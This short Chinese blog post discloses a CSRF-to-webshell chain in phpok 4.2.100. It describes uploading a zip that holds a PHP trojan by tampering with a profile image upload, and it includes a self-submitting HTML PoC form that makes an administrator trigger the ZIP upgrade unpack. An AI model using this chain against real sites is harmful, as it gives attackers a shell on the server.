phpok csrf成功getshell(二)

时间:2015-2-8    作者:admin    分类: 技术交流


版本:4.2.100

前台能上传zip文件,而且对升级文件没进行校验。



上传zip演示:

先把我们的木马文件test.php添加到压缩包内test.zip



注册一个帐号-修改资料.



选择一个正常图片,截获数据

QQ截图20150114164820.png


QQ截图20150114165013.png





然后修改数据。

QQ截图20150114165135.png



成功上传zip文件。记录下文件id号。我们这里是739



在 程序升级 » ZIP离线包升级 中的升级操作没有进行Referer验证。导致csrf产生

code 区域
演示csrf:


123.png





poc:



zipfile为我们刚刚记录下的文件id号:739

code 区域
<form action="http://localhost//phpok/admin.php?c=update&f=unzip" id="poc" name="poc" method="post">

<input type="hidden" name="zipfile" value=""/>

<input type="hidden" name="file" value=""/>

<input type="submit" name="up" value="submit"/>

</form>

<script>

var t = document.poc;

t.zipfile.value="739";

t.file.value="739";

document.poc.submit();

</script>





管理员只要访问我们事先准备好的poc。 就能getshell

test.php躺在根目录那里。


访问poc文件

232.png


111.png

标签: CSRF phpok getshell